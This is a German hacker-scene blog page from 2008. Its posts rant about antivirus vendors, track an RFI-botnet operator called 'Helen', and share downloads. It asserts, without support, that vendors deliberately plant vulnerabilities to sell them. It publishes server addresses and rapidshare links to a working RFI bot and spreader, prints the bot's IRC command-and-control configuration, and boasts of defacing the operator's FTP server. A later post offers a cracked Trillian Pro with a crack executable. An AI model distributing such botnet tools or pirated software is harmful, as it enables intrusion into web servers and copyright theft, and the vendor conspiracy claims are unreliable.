Monate später erst erkannt/hinzugefügt werden zur Viren Datenbank. Genau so werden auch ältere teilweise schon lange vergessene Viren/Tools/bots/trojaner wieder aus der Datenbank entfernt.
Ähnlich läuft es auch z.b. bei Sicherheitslücken ab, ein guter Kollege aus England Frank R. der bei Symantec arbeitet hat mir "Vertraulich" mitgeteilt das es schon öfter mal vorkommt das Anti Vieren Hersteller oder Software Programmierer (php,joomla,etc) absichtlich lücken in die Programme/Scripte mit einbauen um im nachhinein dann Privat diese lücken für Geld weitergibt. Ich möchte bei dem Punkt grade mal ansprechen auf Industriespionage stehen bis zu 8 Jahre Gefängnis also richte ich mich jetzt mal an euch ihr Programmierer oder Anti-Virus Hersteller ich denke die breite masse wird sicherlich lieber weniger viren/bots/Trojaner auf dem Rechner haben wollen als EUCH mit einem neuen BMW vorfahren zu sehen den ihr auf die kosten unserer Computer und Privaten Daten gekauft habt.

JETZT IST NURNOCH ZIVILCOURAGE GEFRAGT UND UNSERE COMPUTER KÖNNEN WIEDER UNBESORGT IM NETZ SURFEN !!!

Hier ein solcher check womit es üblich ist solche Geschäfte zu machen meistens halt von Banken aus Indien,Africa,etc.

Bis hier hin ist das jetzt wirklich ersteinmal nen deftiger schlag in die Fresse für alle die denken sie seien sicher
da sie ja hunderte bis tausende Euro im jahr für sogenannte "Security appz" ausgeben die in wirklichkeit sogut wie
nichts bringen oder nur einen gewissen gewollten schutz der Hersteller. Wovon beim Verkauf dieser Programme aber nie etwas erwähnt wird klingt schon fast nach Betrug oder nicht ? Weil wenn man Zigaretten kauft steht ja auch drauf das sie töten können !!! Bei Viren Programme steht 100%iger schutz beim surfen und wie kommt es dann dazu das 2 jahre alte Trojaner nicht erkannt werden ??? müsste nicht bei den Virenprogrammen auch draufstehen
"Virenprogramme können das Betriebssystem Zerstören" Ich denke da nurmal an Norton Antivirus 2003 damals hatte man das draufgetan und dann wieder deinstalliert und windows war kaputt oder die VirenProgramme löschen Windows Dateien die nichtmal infiziert sind ist das nicht Wandalismus im entferntesten Sinne :)aber anscheinend ist es ja erlaubt etwas zu programmieren was fremde nicht Viriale Programme löscht oder gar Zerstört ich habe nochnie gehört das deswegen eine Firma Strafe zahlen müsste obwohl es natürlich zu verhindern ist aber die Hersteller haben natürlich wie immer nur die Dollar im kopf und anstatt das sie ein update rausbringen bringen sie ein neues Programm raus was dann "blabla Windows Repair" heisst das nenne ich eine extrem dreiste abzockeobs das Online-Banking ist oder auf der Arbeit kurz etwas zu Bestellen. Also sind wir von ihnen abhängig und das wissen die ja natürlich nicht umsonst verschreiben die Anti-Viren Hersteller Gewinne im Milliarden Bereich jedes Jahr wenn man dann noch die reingewinne durch verkaufen von Sicherheitslücken hinzufügt sind das sicherlich 2 stellige Millarden Beträge die die Security Branche an gewinnen einschreibt .
JEDES JAHR

Und sicher sind wir trotzdem nicht :(

So das war einmal mein Senf zu diesem Thema ich möchte noch einmal ausdrücklich hier Niederschreiben das in Deutschland eine Pressefreiheit herrscht dabloggs als Zeitung der Zukunft gesehen werden gillt hier auch dieselbe Presse und Informationsfreiheit ich habe nur um guten willen zu zeigen keine vollen Namen oder so genannt. BTW Ich freue mich über jegliche Kommentare von euch den ich denke da habenvillt einige noch etwas
zu zu sagen scheut euch nicht euren frust oder was auch immer loszuwerden aber immer dran denken beschimpfen hilft auch nicht immer weiter.

Immer mehr RFI-Botnetzwerke und das wiedertreffen eines alten Bekannten !!!

Jo ich habe mal wieder ein bisschen rumgestöbert in der RFI-Welt und ich muss sagen es nimmt kein ende überall kommen neue rfi Botnetzwerke aus dem Boden des Internets Empor und man trifft sogar immerwieder alte bekannte z.b. der "Helen" aus dem "#star" channel war vor ein paar Monaten als ich mein Tutorial
veröffendlicht hatte über rfi-bots noch auf dem Server "84.32.137.157/incoming/upload/trem/" vertreten mit seinem RFI-Bot und Spreader zeugs.die allerdings nach einiger Zeit ihren ftp down genommen haben ( zum glück :) da durch die rasante verbreitung meines Tutorials sehr viele leude auf den ftp gegangen sind und somit anscheinend die Betreiber stuzig gemacht hat bis sie bemerkt haben das sie selber Opfer eines RFI-Netzwerkrings sindvillt abe auch nicht es ist heutzutage schwer den Server Betreibern etwas nachzuweisen ob das jetzt von denen kommt oder ob es ein Hacker/massrooter hochgeladen hat. Aufjedenfall stöber ich so durch die weiten des googles XD und sehe dort einen Server der mir bekannt vorkam aufjedenfall die Ordnerstruktur leider ist nur der Ircd grade down sonst hätte ich sicherlich nochmal nen kleinen smalltalk gehalten dort . So ich hoffe diesesmal Verbreitet sich dieses schreiben villt auch relativ schnell so das sein neuer ftp-server auch schnell down geht wir werden es sehen. Die neue URL von Helen lautet "212.11.127.86/tmp/trem/" Der neue Server liegt in CZ:

netnum:      212.11.127.84 - 212.11.127.87

netname:      COMENIUS01-NET

descr:        COMENIUS

descr:        El. Peskove 17

descr:        Praha 5

country:      CZ

Wenn wir uns den alten Server nocheinmal anschauen sehen wir das dieser in LT liegt

inetnum:      84.32.136.0 - 84.32.139.255

netname:      NTT_DATA_SATELA_NET2

descr:        NTT DATA2 Service for Satela partner

country:      LT

Da CZ und LT ja fast nebeneinander liegen gehe ich mal stark davon aus das Helen auch aus der Region dort kommt und zwar aus Russland/Polen/Ukraine naja einige leute lernen halt nicht aus ist villt auch gut so XD so habe ich jetzt wenigstens den Spaß es zu veröffendlichen also viel spaß mit den dateien und nebenbei auch funzenden spreader Bot den "Helen" dort benutzt ich habe die dateien mal auf rapidshare hochgeladen falls der Server schnell down gehen sollte :
echo commands = http://rapidshare.com/files/131031267/1
RFI-Bot = http://rapidshare.com/files/131031269/2
cmd = http://rapidshare.com/files/131031270/old
echo + cmd = http://rapidshare.com/files/131031289/oldbisok
Hui eben gerade nochmal versucht auf dem irc zu connecten und nun ging es allerdings sind keine bots in diesem channel sonder nur 2 leude und die währen :
Helen = Helen is ~stopper@I.Love.Uk * stopper
Helen is a registered nick
Helen on ~#star
Helen using irc.Smile.net Community irc.Smile.Net
Helen is away: -( I'm away.Log is on (Maybe) ^_^ )- since 06:30p -( P:Off / L:Off )-
Helen has been idle 10hrs 47mins 52secs, signed on Wed Jul 16 21:07:00
Helen End of /WHOIS list.

Unix = Unix is Unix@Irc.Smile.net * Ufficial Irc.Smile.net BoT
Unix is a Network Service
Unix End of /WHOIS list.

Schade der/die Helen ist grade nicht da und der Unix isn irc-network-bot naja auch egal man trifft ihn/sie ja anscheinend öfters an :D so für alle die nicht über rapidshar saugen können und nicht auf den ftp connecten möchten hier einmal kurz die ircd-config vom bot :)

###############################################################
my @adms=("Helen"); # Nick do administrador                 #
#----------------------------------------------################################################
my @canais=("#star");                        # Caso haja senha ("#canal :senha")            #
#----------------------------------------------################################################
my $servidor='smile.homeunix.net'unless $servidor; # Servidor de irc quevai ser usado      #
                                               # caso não seja especificado no argumento      #
#----------------------------------------------################################################
my $porta='6667';                           # Porta do servidor de irc                     #
###############################################################
könnt ja dort mal joinen und einen netten gruß ausrichten von mir falls der ircd in ein paar tagen überhaupt noch existiert. So wie ihr mich ja eigendlich schon kennen solltet habe ich mich aufm ftpd ersmal verewigt XD schaut hier

So viel spaß mit unserem Stammgast Helen :) villt kann ja eienr von euch nun etwas mit den sachen anfangen wenn ihr euch noch weiter zum Thema RFI-Bots informiert habt nach meinem Tutorial wenn nicht naja pech gehabt :( XD

So das wars dann auch erstmal danke fürs lesen schonmal und viel Spaß beim Kommentare geben und immer dran denken beschimpfungen helfen nicht immer weiter.

In diesem Sinne bis demnächst
euer Bloody

von Bloody - veröffentlicht in: News
Kommentar hinzufügen - Kommentare () - empfehlen

Samstag, 19. juli 2008

Ein Bericht über die Scene ( und wir sind vertreten :)

Hallo,
Ich habe gestern abend beim surfen etwas entdeckt und zwar einen Bericht über die Scene wo wir erwähnt wurden :D
ersteinmal vielen dank an den schreiber des Berichtes das Sie uns mit in ihren tollen Bericht mit reingenommen haben. Hier ein kleiner teil was uns betrifft :)

Ausschnitt:
"alles was man braucht + RIESEN FORUM" "die beste resource für hackers und krackers"
na also, das ists doch, schauen wir mal was die leute aus dem untergrund, aus der hacker
szene so rumtreiben ( immerhin, es war eine sehr sehr "lange" reise bis wir endlich den eingang
in den untergrund gefunden haben ). das 1x33x7.de.vu, das sieht so magisch aus dank dem matrix
zahlenkollonen effekt im hintergrund, lasst uns einen besuch abstatten, und zwar aufs board und nicht
die seite bzw. das blog selbst.

So da ihr sicherlich schon drauf wartet endlich den Bericht zu lesen dann viel spaß beim lesen nehmt euch ein bisschen zeit :) aber es lohnt sich :)

Link zum Bericht über die Scene

So ich möchte mich nocheinmal bei den "digital.spirit.bomb" leuten für diesen wirklich tollen Bericht bedanken :) habta echt supi geschrieben :) wenn ihr mehr solcher texte oder feststellungen wollt dann geht doch auf die seite von

Link zur Homepage von digital.spirit.bomb

So jetzt wünsche ich euch noch einen schönen auffendhalt und bis zum nächsten Bericht :)
MFG
Bloody

von Bloody - veröffentlicht in: News
Kommentar hinzufügen - Kommentare (1) - empfehlen

Samstag, 19. juli 2008

Trend Micro : HijackThis v2.0.2

HuHu,
Es ist soweit die neue Version von HijackThis ist draußen und zwar die v2.0.2 was mich allerdings ein wenig stutzig macht Das das ganze nun von Trend Micro ist was es meiner Meinung nach vorher nicht war anscheinend haben die wohl heimlich hijackThis aufgekauft.
Ahhh ich fühle mich bestätigt sie haben Hijackthis aufgekauft ein wunder das es dann noch kostenlos ist und nicht schon Geld kostet naja mal schauen wie der weitere Verlauf von HijackThis sein wird wir sind alle gespannt denke ich mal. Hier die Info das sie aufgekauft wurden.
Link : Informationen zur übernahme von HijackThis durch Trend-Micro

Naja aber noch ist es ja Kostenlos und wirklich eines der besten Programme um seine startup einträge zu verwalten was auch seit kurzem neu ist, ist das man eine Log-Überprüfung der hijackthis logfile durchführen lassen kann was grade für einsteiger in HijackThis sehr Hilfreich sein kann :) da diese ja villt. nochnicht wirlklich wissen was man anklicken soll und was nicht. :D und denke mal niemand scharf drauf wegen sowas ausversehen windows zu schrotten *gg* ist es echt praktisch die logfile dort hochzuladen und analysieren zu lassen das ganze könnt ihr hier machen.
Link : Zum Auswerten der HijackThis Logfiles

Screenshots:

Trend Miccro HijackThis v2.0.2 :
Sieht eigendlich fast so aus wie der Vorgänger :) nur das halt nun Trend Micro noch oben steht und und es halt v2.0.2 ist und es hat noch ein paar neue funktionen müsst ihr ein bisschen mal mit rumspielen :) aber immer dran denken backup machen und das ganze dann wo abspeichern sonst kann der Spaß schnell vorbei sein. XD

HijackThis Logfileauswertung:
So dieses scheint wohl eine neue funktion von hijackthis zu sein die mir Persöhnlich eigendlich sehr gut gefällt das er kritische sachen anzeigt die villt nicht unbedingt auf euren pc´s tummeln sollten ^^. das ganze ist recht siple auf der hijackThis startseite bei durchsuchen seine logfile eingeben und auswerten lassen danach bekommt ihr eine detaillierte wiedergabe wie ihr hier unten sehen könnt :) gras für Anfänger sehr hilfreich.

Hier findet ihr nun den Direct-Download und 3 Mirrors auf share hostern
Viel Spaß beim herunterladen :)

Direct-Download :
http://download.hijackthis.eu/HJTInstall.exe
Mirror 1 : Ziddu.com
http://www.ziddu.com/download/1689140/HJTInstall.exe.html
Mirror 2 : Bluehost.to :
http://bluehost.to/dl=AQCmgG0iy
Mirror 3 : Rapidshare.com :
http://rapidshare.com/files/130819027/HJTInstall.exe

einen schönen tag euch allen noch und bis zum nächsten mal :)
mfg Bloody

von Bloody - veröffentlicht in: Security - Tools
Kommentar hinzufügen - Kommentare () - empfehlen

Samstag, 19. juli 2008

Trillian_Pro_v3.1.8.0-1x33x7 (Deutsch)

HuHu, hier mal Das Aktuelle Trillian mit update Funktion habe das aus mehreren sachen zusammengewürfelt :)
enthalten in der rar ist.
1. Setup.exe
2. Deutsch-mod.exe
3. crack.exe

in dieser reihenfolge wie oben aufgelistet müsst ihr das ganze auch installieren also 1,2,3 dann starten und es geht :)

viel spaß

Download:
http://rapidshare.com/files/130787688/Trillian_Pro_v3.1.8.0-1x33x7.rar

mfg Bloodman

von Bloody - veröffentlicht in: Sonstiges
Kommentar hinzufügen - Kommentare () - empfehlen

Fotos

Feeds

Suchen

Partner / Links

Archiv

Kategorien

huhu

nun endgültig neues board online

RFI-bot Tutorial

BOARD ONLINE

-[ RFI ]- Verfolgung, Spaß und Infos mit Rfi und Google

board down :(

Forum wieder Online

RFI-Project backdoor analysing

rfibot by Osyris (Private)

Google bypass Script

14 Hacking Tools Download

Project RFI by: fUSiON

|||RFI-BOT ||| Ksteal.by.Osyris.Priv8.mod.by.1x33x7 |||Deutsch|||

Dj Bloody - Sesseion #1 -10.08.08-

Den #h4x0rs rfi-chan gefunden und Snake ist Admin

Die Verfolgung von "Helen" und das Interview

1x33x7 Newspaper 20.07.08

Ein Bericht über die Scene ( und wir sind vertreten :)

Trend Micro : HijackThis v2.0.2

Trillian_Pro_v3.1.8.0-1x33x7 (Deutsch)

1x33x7 - Home

Zufallsbilder

Forum

Kalender

Letzte Artikel

Neueste Kommentare